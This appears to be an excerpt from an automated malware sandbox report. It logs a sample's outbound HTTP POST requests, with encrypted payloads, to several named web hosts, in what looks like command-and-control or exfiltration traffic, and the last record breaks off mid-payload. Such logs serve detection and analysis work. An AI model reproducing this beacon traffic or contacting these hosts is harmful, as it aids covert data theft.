RUDWZDUVp8r4pCV1nCWLKy431IHDCP2SOY3MGkOglVQWSE7ZJ7vdWQ5+6CkvFUqp8B+E1VtIO+FOROSzzHTTxhONmWpHuq7YXsuyLcr1naqhR8di/EbGQ3Gp9lT70CSJRRKTm3yF4vNoTYmQfsmBtDTtO+1ByA3l+tD+fCuwXCfy2oeyNAJeIwcUdSc2UoKj5NbiI8TDPk1VUS+0yscd1cZPacB7mmQBM/RMjlTwNb3Ihgua8jN2VIVJgpGxCIQTK35LUcbnRr25wCMw05tlBgGpEs1PWGJEPcdreBBZ8vpEfI666wSLNH2i+TP1IjB75bE1TT9xsaqDMpLUNsayl5XTP/D56PS04PZarMO41CY5pGBbOtmqgebptReb502sYAFtIkg5zf+tsF2KnKJW/T39UoBhHpmzkXvfdzYo7jJyqqMR/5DMDx/eaANknKE8uSh0fJvoZ/mKoOfK3w89KRQGlnl1/MuJ6t3em1AbNHbgE7ymP83THXbo4sXbiLfR30bISC1Q6CTTKnszJAe68iawqw9DkXV5ReVeeKbEJZ/hnl2gQGin8UjxWG7YB4MvZ9bbZyyoTgG/828rV6v7DA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.credo.edu.plCache-Control: no-cacheData Raw: 52 55 44 57 5a 44 55 56 70 38 72 34 70 43 56 31 6e 43 57 4c 4b 79 34 33 31 49 48 44 43 50 32 53 4f 59 33 4d 47 6b 4f 67 6c 56 51 57 53 45 37 5a 4a 37 76 64 57 51 35 2b 36 43 6b 76 46 55 71 70 38 42 2b 45 31 56 74 49 4f 2b 46 4f 52 4f 53 7a 7a 48 54 54 78 68 4f 4e 6d 57 70 48 75 71 37 59 58 73 75 79 4c 63 72 31 6e 61 71 68 52 38 64 69 2f 45 62 47 51 33 47 70 39 6c 54 37 30 43 53 4a 52 52 4b 54 6d 33 79 46 34 76 4e 6f 54 59 6d 51 66 73 6d 42 74 44 54 74 4f 2b 31 42 79 41 33 6c 2b 74 44 2b 66 43 75 77 58 43 66 79 32 6f 65 79 4e 41 4a 65 49 77 63 55 64 53 63 32 55 6f 4b 6a 35 4e 62 69 49 38 54 44 50 6b 31 56 55 53 2b 30 79 73 63 64 31 63 5a 50 61 63 42 37 6d 6d 51 42 4d 2f 52 4d 6a 6c 54 77 4e 62 33 49 68 67 75 61 38 6a 4e 32 56 49 56 4a 67 70 47 78 43 49 51 54 4b 33 35 4c 55 63 62 6e 52 72 32 35 77 43 4d 77 30 35 74 6c 42 67 47 70 45 73 31 50 57 47 4a 45 50 63 64 72 65 42 42 5a 38 76 70 45 66 49 36 36 36 77 53 4c 4e 48 32 69 2b 54 50 31 49 6a 42 37 35 62 45 31 54 54 39 78 73 61 71 44 4d 70 4c 55 4e 73 61 79 6c 35 58 54 50 2f 44 35 36 50 53 30 34 50 5a 61 72 4d 4f 34 31 43 59 35 70 47 42 62 4f 74 6d 71 67 65 62 70 74 52 65 62 35 30 32 73 59 41 46 74 49 6b 67 35 7a 66 2b 74 73 46 32 4b 6e 4b 4a 57 2f 54 33 39 55 6f 42 68 48 70 6d 7a 6b 58 76 66 64 7a 59 6f 37 6a 4a 79 71 71 4d 52 2f 35 44 4d 44 78 2f 65 61 41 4e 6b 6e 4b 45 38 75 53 68 30 66 4a 76 6f 5a 2f 6d 4b 6f 4f 66 4b 33 77 38 39 4b 52 51 47 6c 6e 6c 31 2f 4d 75 4a 36 74 33 65 6d 31 41 62 4e 48 62 67 45 37 79 6d 50 38 33 54 48 58 62 6f 34 73 58 62 69 4c 66 52 33 30 62 49 53 43 31 51 36 43 54 54 4b 6e 73 7a 4a 41 65 36 38 69 61 77 71 77 39 44 6b 58 56 35 52 65 56 65 65 4b 62 45 4a 5a 2f 68 6e 6c 32 67 51 47 69 6e 38 55 6a 78 57 47 37 59 42 34 4d 76 5a 39 62 62 5a 79 79 6f 54 67 47 2f 38 32 38 72 56 36 76 37 44 41 3d 3d Data Ascii: RUDWZDUVp8r4pCV1nCWLKy431IHDCP2SOY3MGkOglVQWSE7ZJ7vdWQ5+6CkvFUqp8B+E1VtIO+FOROSzzHTTxhONmWpHuq7YXsuyLcr1naqhR8di/EbGQ3Gp9lT70CSJRRKTm3yF4vNoTYmQfsmBtDTtO+1ByA3l+tD+fCuwXCfy2oeyNAJeIwcUdSc2UoKj5NbiI8TDPk1VUS+0yscd1cZPacB7mmQBM/RMjlTwNb3Ihgua8jN2VIVJgpGxCIQTK35LUcbnRr25wCMw05tlBgGpEs1PWGJEPcdreBBZ8vpEfI666wSLNH2i+TP1IjB75bE1TT9xsaqDMpLUNsayl5XTP/D56PS04PZarMO41CY5pGBbOtmqgebptReb502sYAFtIkg5zf+tsF2KnKJW/T39UoBhHpmzkXvfdzYo7jJyqqMR/5DMDx/eaANknKE8uSh0fJvoZ/mKoOfK3w89KRQGlnl1/MuJ6t3em1AbNHbgE7ymP83THXbo4sXbiLfR30bISC1Q6CTTKnszJAe68iawqw9DkXV5ReVeeKbEJZ/hnl2gQGin8UjxWG7YB4MvZ9bbZyyoTgG/828rV6v7DA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.tvtools.fiCache-Control: no-cacheData Raw: 43 6b 44 6a 4e 56 38 76 74 73 6f 59 61 54 65 44 76 6a 58 57 76 75 69 51 59 33 67 31 56 38 64 65 41 30 58 50 6d 78 6f 65 4c 4e 71 59 67 45 72 73 62 47 71 63 48 2b 4a 64 59 47 33 69 44 45 56 68 64 70 61 77 61 55 76 71 7a 55 50 7a 49 56 38 69 6e 4d 75 6f 4d 56 63 39 6a 62 45 48 49 67 43 6f 4d 75 6b 71 38 42 66 6a 42 77 78 4b 35 5a 42 64 6b 55 66 71 7a 2f 35 52 31 63 47 35 6f 4a 52 48 79 61 44 70 44 35 41 39 6c 51 54 61 41 30 4e 66 30 63 52 55 65 50 57 34 55 49 71 38 4e 4c 65 30 49 36 68 64 6b 63 59 44 58 58 6d 37 44 52 55 4f 62 36 37 46 6f 36 33 34 4f 32 31 47 48 6f 51 76 42 68 64 47 63 59 4b 55 50 51 52 78 50 6c 4d 58 6b 2b 61 32 47 45 4b 39 4f 6d 4b 77 78 59 7a 31 63 42 41 38 78 76 4e 63 61 62 76 41 47 6a 52 55 44 69 57 39 75 37 6c 66 41 6c 41 39 43 58 39 37 4b 42 32 4d 50 6d 79 34 66 55 4a 79 49 77 41 48 57 6a 4b 33 5a 53 6c 47 38 4c 67 33 47 52 4c 52 73 52 43 4d 58 48 38 7a 49 4b 54 32 51 78 61 41 4f 4f 38 30 43 58 43 68 50 6d 5a 39 39 48 53 65 65 30 53 59 44 73 79 6b 4f 5a 72 77 7a 4b 33 72 65 34 37 77 50 4e 33 4d 6e 4f 57 6f 75 68 32 58 6b 6e 39 6c 34 55 35 62 37 78 6b 66 74 71 47 4f 74 33 50 62 55 57 62 62 53 39 47 64 2f 76 68 32 67 44 64 43 4a 4b 58 57 4c 4e 75 5a 46 7a 59 61 76 54 61 63 4f 55 43 6b 4e 77 50 41 45 34 73 37 48 78 38 57 77 47 4d 6b 36 36 4e 70 41 68 46 4e 66 78 70 77 4b 68 57 41 6f 50 36 6e 4d 5a 32 50 65 6b 4a 64 2f 45 73 76 4c 61 6c 6d 42 4f 57 72 70 36 63 34 6a 4e 33 49 56 54 4b 53 4b 32 6a 78 48 37 2b 4c 56 67 5a 4e 70 48 4a 32 46 58 35 57 57 70 75 74 48 41 68 6c 41 48 43 50 4d 41 74 49 6b 47 6b 37 6b 76 4a 4d 5a 4b 69 71 55 35 76 74 69 78 64 68 6e 41 57 48 6e 4c 69 6d 2b 61 52 2b 4e 4e 42 4c 39 32 71 59 41 34 66 68 56 39 52 62 31 36 30 69 67 67 30 52 52 66 30 79 30 72 45 6b 6f 67 3d 3d Data Ascii: CkDjNV8vtsoYaTeDvjXWvuiQY3g1V8deA0XPmxoeLNqYgErsbGqcH+JdYG3iDEVhdpawaUvqzUPzIV8inMuoMVc9jbEHIgCoMukq8BfjBwxK5ZBdkUfqz/5R1cG5oJRHyaDpD5A9lQTaA0Nf0cRUePW4UIq8NLe0I6hdkcYDXXm7DRUOb67Fo634O21GHoQvBhdGcYKUPQRxPlMXk+a2GEK9OmKwxYz1cBA8xvNcabvAGjRUDiW9u7lfAlA9CX97KB2MPmy4fUJyIwAHWjK3ZSlG8Lg3GRLRsRCMXH8zIKT2QxaAOO80CXChPmZ99HSee0SYDsykOZrwzK3re47wPN3MnOWouh2Xkn9l4U5b7xkftqGOt3PbUWbbS9Gd/vh2gDdCJKXWLNuZFzYavTacOUCkNwPAE4s7Hx8WwGMk66NpAhFNfxpwKhWAoP6nMZ2PekJd/EsvLalmBOWrp6c4jN3IVTKSK2jxH7+LVgZNpHJ2FX5WWputHAhlAHCPMAtIkGk7kvJMZKiqU5vtixdhnAWHnLim+aR+NNBL92qYA4fhV9Rb160igg0RRf0y0rEkog==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 46 6c 74 54 4e 67 49 7a 74 73 71 56 76 43 64 36 39 56 59 30 47 34 57 50 58 4f 6f 53 30 32 6a 56 56 71 45 6c 45 74 41 71 70 48 56 46 6a 6f 47 32 65 59 2f 42 77 49 37 72 4e 2b 33 47 43 51 78 53 5a 43 4e 49 67 47 65 6a 59 6e 70 4c 53 6f 31 66 6e 47 68 5a 31 67 42 4d 4a 5a 55 7a 4d 32 30 59 73 2f 69 64 35 67 42 64 58 30 4e 53 4e 2b 6b 4d 65 55 33 68 67 33 6d 39 58 7a 76 74 6a 70 6b 31 49 6c 35 67 66 4a 74 6c 34 2b 76 4e 4f 6d 46 2f 4d 58 7a 2f 45 70 79 73 54 7a 48 47 48 48 55 68 34 72 7a 4d 30 43 37 61 35 76 68 7a 56 74 4e 34 65 71 30 57 54 63 50 4f 45 59 4c 67 65 39 73 6f 2b 64 32 4d 32 56 77 47 51 61 47 4e 43 6a 6e 41 51 53 46 63 7a 52 33 6e 64 4c 79 44 4e 6d 70 2b 6e 61 51 49 79 62 44 5a 48 77 2b 78 4f 47 76 2b 35 43 52 75 48 51 58 4e 2b 62 44 6f 33 4d 49 65 76 6e 73 5a 57 56 35 70 49 31 75 36 69 4e 70 48 62 33 73 46 42 53 64 4a 57 67 30 58 6d 4c 71 30 4b 79 54 38 6f 48 65 36 51 70 5a 61 35 58 37 2b 68 51 57 74 74 4c 41 6a 43 72 6b 34 6c 4a 52 6b 54 69 76 4e 71 61 4a 69 4f 37 69 52 32 68 76 5a 57 4c 43 34 50 34 4f 70 39 6a 53 41 76 5a 54 6c 39 2b 78 46 4b 72 49 2b 30 4c 30 72 5a 62 45 57 6f 30 33 4c 39 6f 73 47 76 61 63 79 61 4c 6d 5a 4b 44 6c 4c 63 63 36 52 50 64 34 78 30 78 55 31 76 77 62 49 4b 39 57 2f 47 61 55 6a 6b 32 38 66 4e 6c 5a 74 61 4a 67 49 57 58 4a 54 32 37 33 59 67 46 67 63 4f 56 62 2b 44 65 65 77 34 4f 4d 54 6d 30 4b 54 33 4a 76 56 74 54 35 68 5a 48 44 68 47 57 42 56 2f 5a 50 37 2b 76 7a 6f 58 55 55 64 43 6e 4f 49 64 4c 71 4f 43 54 6e 75 4f 6e 4e 71 76 71 4e 65 4b 56 65 35 6b 35 4e 32 33 76 54 61 5a 34 2f 57 52 6f 6f 44 58 2b 59 73 4f 69 33 64 78 2b 32 79 33 48 59 45 2f 58 67 5a 6c 41 35 73 78 44 30 42 54 65 4f 54 Data Ascii: FltTNgIztsqVvCd69VY0G4WPXOoS02jVVqElEtAqpHVFjoG2eY/BwI7rN+3GCQxSZCNIgGejYnpLSo1fnGhZ1gBMJZUzM20Ys/id5gBdX0NSN+kMeU3hg3m9Xzvtjpk1Il5gfJtl4+vNOmF/MXz/EpysTzHGHHUh4rzM0C7a5vhzVtN4eq0WTcPOEYLge9so+d2M2VwGQaGNCjnAQSFczR3ndLyDNmp+naQIybDZHw+xOGv+5CRuHQXN+bDo3MIevnsZWV5pI1u6iNpHb3sFBSdJWg0XmLq0KyT8oHe6QpZa5X7+hQWttLAjCrk4lJRkTivNqaJiO7iR2hvZWLC4P4Op9jSAvZTl9+xFKrI+0L0rZbEWo03L9osGvacyaLmZKDlLcc6RPd4x0xU1vwbIK9W/GaUjk28fNlZtaJgIWXJT273YgFgcOVb+Deew4OMTm0KT3JvVtT5hZHDhGWBV/ZP7+vzoXUUdCnOIdLqOCTnuOnNqvqNeKVe5k5N23vTaZ4/WRooDX+YsOi3dx+2y3HYE/XgZlA5sxD0BTeOT
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.petsfan.comCache-Control: no-cacheData Raw: 68 33 56 32 4d 7a 59 62 74 73 70 61 52 46 36 71 6b 64 6e 4c 76 74 6d 46 48 31 6c 57 67 55 43 58 79 74 49 79 6b 66 37 38 36 35 46 57 64 61 6e 46 72 4d 6a 6d 48 6c 79 76 5a 6f 71 68 46 38 35 54 69 56 47 4a 77 55 64 57 53 45 67 51 43 51 67 57 7a 74 37 77 4b 41 48 6d 53 69 74 66 48 39 78 6d 46 2b 38 46 59 6a 71 50 6c 30 35 2b 79 56 33 4d 4e 46 53 74 73 6f 71 78 4a 57 66 46 78 79 4c 4a 44 4c 72 76 4b 6d 4e 4c 6e 57 71 50 41 55 4c 2b 44 2b 31 6d 50 78 66 6a 69 7a 44 30 45 56 42 46 6d 6b 36 51 74 59 4e 71 71 2b 50 74 55 35 2f 6f 45 53 67 68 37 42 6b 42 39 61 4b 4b 45 6f 59 73 39 6f 71 5a 66 38 63 4f 2b 64 52 70 76 63 5a 59 41 6b 4f 77 5a 62 32 51 54 33 73 4d 55 6e 43 72 6f 42 6c 37 61 79 32 57 71 63 6b 35 5a 68 72 69 65 4c 4a 73 75 39 4a 4c 50 4d 64 42 75 51 4d 7a 62 48 77 6e 39 4e 2b 75 52 32 2b 4d 37 32 36 4c 34 61 35 65 53 47 6b 6f 59 73 70 51 57 46 71 52 6b 4d 36 6b 6b 79 6b 62 43 45 64 4f 53 68 68 53 57 72 67 4e 42 76 6c 57 4d 33 30 6b 61 56 67 6d 76 4b 33 41 51 4b 32 31 76 76 42 4e 4c 6e 6f 6e 62 74 63 78 70 4a 38 36 69 5a 57 7a 65 4c 64 4c 78 42 4a 6e 70 4d 58 41 49 58 6e 6a 6d 4a 79 36 66 4a 64 41 65 46 4e 30 7a 45 61 36 34 4f 64 56 76 57 74 43 72 70 70 46 64 66 5a 64 67 77 51 56 37 58 56 54 48 6c 7a 52 37 38 63 56 38 67 77 77 43 54 6b 4d 51 65 35 58 69 35 67 55 73 4b 66 77 51 73 33 63 46 52 78 7a 6a 59 72 54 36 39 49 6b 54 74 70 43 69 78 6e 78 4f 62 39 57 4c 6e 52 38 46 6c 65 33 49 6a 33 61 44 41 6a 30 56 36 46 75 53 32 48 65 74 61 4f 4f 51 68 62 31 72 77 37 78 4f 36 6e 74 57 79 53 53 39 61 67 4e 44 32 59 57 39 71 42 74 39 6d 66 49 4a 2f 7a 4b 41 76 43 6d 69 38 4d 58 63 6c 69 74 49 7a 64 51 71 59 46 72 77 5a 6c 73 64 67 37 57 6b 6d 39 2f 51 41 3d 3d Data Ascii: h3V2MzYbtspaRF6qkdnLvtmFH1lWgUCXytIykf7865FWdanFrMjmHlyvZoqhF85TiVGJwUdWSEgQCQgWzt7wKAHmSitfH9xmF+8FYjqPl05+yV3MNFStsoqxJWfFxyLJDLrvKmNLnWqPAUL+D+1mPxfjizD0EVBFmk6QtYNqq+PtU5/oESgh7BkB9aKKEoYs9oqZf8cO+dRpvcZYAkOwZb2QT3sMUnCroBl7ay2Wqck5ZhrieLJsu9JLPMdBuQMzbHwn9N+uR2+M726L4a5eSGkoYspQWFqRkM6kkykbCEdOShhSWrgNBvlWM30kaVgmvK3AQK21vvBNLnonbtcxpJ86iZWzeLdLxBJnpMXAIXnjmJy6fJdAeFN0zEa64OdVvWtCrppFdfZdgwQV7XVTHlzR78cV8gwwCTkMQe5Xi5gUsKfwQs3cFRxzjYrT69IkTtpCixnxOb9WLnR8Fle3Ij3aDAj0V6FuS2HetaOOQhb1rw7xO6ntWySS9agND2YW9qBt9mfIJ/zKAvCmi8MXclitIzdQqYFrwZlsdg7Wkm9/QA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abart.plCache-Control: no-cacheData Raw: 69 50 6c 57 6a 46 64 4f 77 63 70 37 72 56 30 67 52 70 66 31 4d 36 41 6d 48 49 32 4e 6e 53 30 78 65 35 64 47 42 6c 57 59 55 39 51 48 75 76 4b 32 49 64 6f 4c 32 62 62 43 2f 2b 65 38 51 5a 30 32 44 77 61 4a 4d 41 41 78 61 30 6e 73 74 46 75 4f 57 49 6d 59 77 73 6d 37 71 61 49 4f 42 54 73 4d 79 49 6d 4a 58 70 70 74 2f 42 52 6e 6c 45 75 6f 6d 50 46 72 55 2f 61 37 49 48 31 4b 32 6b 4f 74 77 55 75 66 63 30 59 6b 6d 6e 72 4c 2f 35 75 7a 6c 70 65 54 34 79 4d 4f 66 6f 64 62 57 73 63 79 62 77 63 56 53 69 6c 79 2f 39 50 72 79 2f 30 34 68 2b 59 57 50 75 30 6a 49 52 6f 4d 66 39 78 55 79 36 45 6a 6a 6e 49 4c 73 68 32 6f 4f 4a 52 58 43 4d 7a 7a 6f 6d 5a 31 39 6e 50 59 45 37 33 55 6c 30 76 4c 79 77 67 49 30 32 51 57 58 59 77 55 71 64 45 5a 41 54 55 6e 78 4c 46 54 64 46 39 38 42 2f 64 50 46 73 5a 61 77 54 4d 39 33 74 79 74 66 50 58 75 76 75 5a 79 36 56 76 74 68 77 65 6d 59 73 34 56 5a 61 67 50 61 77 55 32 4c 73 69 51 2b 6e 59 2f 47 30 4e 5a 67 73 4a 76 73 79 45 4d 44 4b 49 44 36 68 78 65 4d 6d 6b 4e 48 5a 71 4f 74 33 6b 79 58 5a 76 44 35 7a 36 70 49 41 39 51 46 53 63 75 36 4b 36 6b 7a 2f 47 57 7a 4d 57 66 58 4c 58 4f 70 57 51 4b 66 45 39 32 7a 34 69 32 74 41 53 61 74 4f 6f 47 42 6f 2f 44 56 53 6b 30 6b 7a 67 41 49 37 6f 6c 6f 34 4a 66 44 4a 73 37 62 57 6c 2b 51 6f 51 66 76 74 59 59 6a 33 59 4f 6e 6c 4f 42 52 65 7a 39 4c 76 52 59 4f 31 64 2f 53 68 57 4d 4b 43 45 4d 58 74 61 43 76 6d 45 39 32 5a 32 2b 41 4c 43 33 56 4a 6e 5a 47 47 70 6d 45 6a 77 75 6c 49 63 4f 69 68 44 66 34 6a 35 49 79 37 74 6d 47 38 35 62 56 69 41 44 54 44 66 74 66 69 52 64 73 76 53 35 4b 71 77 38 6b 42 32 63 31 71 76 35 49 42 39 65 4f 46 2f 46 6b 64 44 52 71 4e 36 6d 56 47 78 75 64 2b 65 6e 61 39 7a 72 53 64 67 55 39 32 4b 64 4e 2f 43 74 4f 74 35 57 58 43 6f 71 6d 62 59 72 37 52 4d 3d Data Ascii: iPlWjFdOwcp7rV0gRpf1M6AmHI2NnS0xe5dGBlWYU9QHuvK2IdoL2bbC/+e8QZ02DwaJMAAxa0nstFuOWImYwsm7qaIOBTsMyImJXppt/BRnlEuomPFrU/a7IH1K2kOtwUufc0YkmnrL/5uzlpeT4yMOfodbWscybwcVSily/9Pry/04h+YWPu0jIRoMf9xUy6EjjnILsh2oOJRXCMzzomZ19nPYE73Ul0vLywgI02QWXYwUqdEZATUnxLFTdF98B/dPFsZawTM93tytfPXuvuZy6VvthwemYs4VZagPawU2LsiQ+nY/G0NZgsJvsyEMDKID6hxeMmkNHZqOt3kyXZvD5z6pIA9QFScu6K6kz/GWzMWfXLXOpWQKfE92z4i2tASatOoGBo/DVSk0kzgAI7olo4JfDJs7bWl+QoQfvtYYj3YOnlOBRez9LvRYO1d/ShWMKCEMXtaCvmE92Z2+ALC3VJnZGGpmEjwulIcOihDf4j5Iy7tmG85bViADTDftfiRdsvS5Kqw8kB2c1qv5IB9eOF/FkdDRqN6mVGxud+ena9zrSdgU92KdN/CtOt5WXCoqmbYr7RM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.otena.comCache-Control: no-cacheData Raw: 72 2b 56 6f 6a 4f 31 4f 77 63 72 34 71 4c 48 30 35 47 50 58 51 71 5a 74 49 69 6a 62 51 50 72 6c 63 55 61 7a 6b 30 52 30 55 78 79 55 78 31 6d 6f 79 53 43 6a 4d 4f 54 69 72 6e 69 42 69 32 4a 71 45 74 50 6f 41 76 4f 2f 63 72 48 64 4e 49 6f 4b 6d 6f 41 57 58 4c 34 37 4b 4e 42 4a 45 43 50 44 43 77 35 39 44 38 65 4e 6d 39 76 69 5a 39 39 6d 4f 34 57 74 6f 6b 6b 50 70 4d 70 45 6b 61 57 72 33 4b 4d 75 71 6e 71 34 31 35 57 6d 61 33 68 30 66 34 4c 72 71 55 47 73 56 32 79 43 35 74 48 42 4a 68 75 58 6a 4e 78 6d 45 38 31 36 79 4c 62 59 54 48 6b 33 41 54 49 4c 6f 56 70 65 32 36 6c 61 42 6e 42 4c 68 58 5a 6c 75 6b 73 4b 65 59 72 5a 31 57 74 75 4f 30 5a 68 63 64 75 43 42 55 44 4d 2b 55 76 51 65 58 6b 54 61 75 78 6a 71 6b 56 55 38 42 4c 72 4e 65 54 67 74 79 4e 6c 45 59 37 73 75 30 42 52 77 6a 2f 54 5a 66 69 6b 58 4b 75 38 76 4f 6e 6b 61 44 38 58 4c 49 42 5a 54 70 46 61 75 39 7a 2f 44 7a 74 43 63 42 63 41 55 33 61 45 5a 4c 55 61 4d 31 7a 4a 2f 64 66 63 4a 34 51 69 31 41 4c 43 6c 4a 43 46 6d 77 56 4a 53 51 61 4b 64 5a 63 37 31 35 59 36 6a 5a 45 2f 65 2f 2b 4c 4f 31 68 73 7a 6e 70 7a 72 52 4e 39 2b 76 36 39 47 45 4f 6b 52 49 53 47 6f 36 57 71 4a 78 33 6a 51 51 67 41 63 59 72 56 49 67 36 37 6b 56 6f 42 52 2b 45 75 35 32 4c 66 68 6f 52 4d 52 38 44 69 45 58 43 49 44 49 56 34 42 6a 63 42 32 64 77 33 73 42 5a 54 72 6d 43 64 46 53 33 50 30 6b 47 34 65 33 4b 37 30 70 70 4a 56 62 64 67 67 72 76 58 6a 75 51 50 6b 65 32 48 4b 6e 48 70 49 4f 4c 31 6e 6b 36 53 78 46 6c 77 76 7a 4a 65 68 6f 61 71 32 63 6d 6f 4d 44 65 36 4e 6a 62 74 79 65 66 55 6a 2f 67 5a 70 4a 4e 66 75 4d 51 72 67 56 48 74 47 45 48 67 4a 4c 73 79 47 4d 78 58 6a 62 2b 7a 67 6d 6c 2b 2f 63 52 6c 71 6f 30 2f 63 64 33 65 49 71 72 63 54 70 2f 37 4a 64 62 6f 68 6c 51 4d 37 65 78 36 68 77 65 78 52 5a 46 4b Data Ascii: r+VojO1Owcr4qLH05GPXQqZtIijbQPrlcUazk0R0UxyUx1moySCjMOTirniBi2JqEtPoAvO/crHdNIoKmoAWXL47KNBJECPDCw59D8eNm9viZ99mO4WtokkPpMpEkaWr3KMuqnq415Wma3h0f4LrqUGsV2yC5tHBJhuXjNxmE816yLbYTHk3ATILoVpe26laBnBLhXZluksKeYrZ1WtuO0ZhcduCBUDM+UvQeXkTauxjqkVU8BLrNeTgtyNlEY7su0BRwj/TZfikXKu8vOnkaD8XLIBZTpFau9z/DztCcBcAU3aEZLUaM1zJ/dfcJ4Qi1ALClJCFmwVJSQaKdZc715Y6jZE/e/+LO1hsznpzrRN9+v69GEOkRISGo6WqJx3jQQgAcYrVIg67kVoBR+Eu52LfhoRMR8DiEXCIDIV4BjcB2dw3sBZTrmCdFS3P0kG4e3K70ppJVbdggrvXjuQPke2HKnHpIOL1nk6SxFlwvzJehoaq2cmoMDe6NjbtyefUj/gZpJNfuMQrgVHtGEHgJLsyGMxXjb+zgml+/cRlqo0/cd3eIqrcTp/7JdbohlQM7ex6hwexRZFK
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 46 6c 74 54 4e 67 49 7a 74 73 71 56 76 43 64 36 39 56 59 30 47 34 57 50 58 4f 6f 53 30 32 6a 56 56 71 45 6c 45 74 41 71 70 48 56 46 6a 6f 47 32 65 59 2f 42 77 49 37 72 4e 2b 33 47 43 51 78 53 5a 43 4e 49 67 47 65 6a 59 6e 70 4c 53 6f 31 66 6e 47 68 5a 31 67 42 4d 4a 5a 55 7a 4d 32 30 59 73 2f 69 64 35 67 42 64 58 30 4e 53 4e 2b 6b 4d 65 55 33 68 67 33 6d 39 58 7a 76 74 6a 70 6b 31 49 6c 35 67 66 4a 74 6c 34 2b 76 4e 4f 6d 46 2f 4d 58 7a 2f 45 70 79 73 54 7a 48 47 48 48 55 68 34 72 7a 4d 30 43 37 61 35 76 68 7a 56 74 4e 34 65 71 30 57 54 63 50 4f 45 59 4c 67 65 39 73 6f 2b 64 32 4d 32 56 77 47 51 61 47 4e 43 6a 6e 41 51 53 46 63 7a 52 33 6e 64 4c 79 44 4e 6d 70 2b 6e 61 51 49 79 62 44 5a 48 77 2b 78 4f 47 76 2b 35 43 52 75 48 51 58 4e 2b 62 44 6f 33 4d 49 65 76 6e 73 5a 57 56 35 70 49 31 75 36 69 4e 70 48 62 33 73 46 42 53 64 4a 57 67 30 58 6d 4c 71 30 4b 79 54 38 6f 48 65 36 51 70 5a 61 35 58 37 2b 68 51 57 74 74 4c 41 6a 43 72 6b 34 6c 4a 52 6b 54 69 76 4e 71 61 4a 69 4f 37 69 52 32 68 76 5a 57 4c 43 34 50 34 4f 70 39 6a 53 41 76 5a 54 6c 39 2b 78 46 4b 72 49 2b 30 4c 30 72 5a 62 45 57 6f 30 33 4c 39 6f 73 47 76 61 63 79 61 4c 6d 5a 4b 44 6c 4c 63 63 36 52 50 64 34 78 30 78 55 31 76 77 62 49 4b 39 57 2f 47 61 55 6a 6b 32 38 66 4e 6c 5a 74 61 4a 67 49 57 58 4a 54 32 37 33 59 67 46 67 63 4f 56 62 2b 44 65 65 77 34 4f 4d 54 6d 30 4b 54 33 4a 76 56 74 54 35 68 5a 48 44 68 47 57 42 56 2f 5a 50 37 2b 76 7a 6f 58 55 55 64 43 6e 4f 49 64 4c 71 4f 43 54 6e 75 4f 6e 4e 71 76 71 4e 65 4b 56 65 35 6b 35 4e 32 33 76 54 61 5a 34 2f 57 52 6f 6f 44 58 2b 59 73 4f 69 33 64 78 2b 32 79 33 48 59 45 2f 58 67 5a 6c 41 35 73 78 44 30 42 54 65 4f 54 Data Ascii: FltTNgIztsqVvCd69VY0G4WPXOoS02jVVqElEtAqpHVFjoG2eY/BwI7rN+3GCQxSZCNIgGejYnpLSo1fnGhZ1gBMJZUzM20Ys/id5gBdX0NSN+kMeU3hg3m9Xzvtjpk1Il5gfJtl4+vNOmF/MXz/EpysTzHGHHUh4rzM0C7a5vhzVtN4eq0WTcPOEYLge9so+d2M2VwGQaGNCjnAQSFczR3ndLyDNmp+naQIybDZHw+xOGv+5CRuHQXN+bDo3MIevnsZWV5pI1u6iNpHb3sFBSdJWg0XmLq0KyT8oHe6QpZa5X7+hQWttLAjCrk4lJRkTivNqaJiO7iR2hvZWLC4P4Op9jSAvZTl9+xFKrI+0L0rZbEWo03L9osGvacyaLmZKDlLcc6RPd4x0xU1vwbIK9W/GaUjk28fNlZtaJgIWXJT273YgFgcOVb+Deew4OMTm0KT3JvVtT5hZHDhGWBV/ZP7+vzoXUUdCnOIdLqOCTnuOnNqvqNeKVe5k5N23vTaZ4/WRooDX+YsOi3dx+2y3HYE/XgZlA5sxD0BTeOT
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.transsib.comCache-Control: no-cacheData Raw: 5a 74 4c 34 35 44 41 76 78 4d 71 6b 6e 78 30 6d 51 33 6a 69 54 75 4f 4e 53 45 62 59 4a 59 54 45 5a 50 6c 63 69 46 67 6b 41 59 39 46 61 62 41 63 56 32 63 79 2b 49 45 43 55 49 35 57 48 6f 76 61 74 42 64 46 4f 31 42 72 4f 36 7a 6d 43 57 46 46 76 50 4e 44 52 2f 6d 76 45 4c 4d 36 4c 6b 69 44 6e 57 4d 2b 33 62 69 52 56 33 6a 69 79 4b 54 53 32 75 69 78 38 63 59 38 7a 6f 4b 37 2f 6d 58 58 75 73 57 41 73 59 50 66 49 30 5a 74 65 4e 45 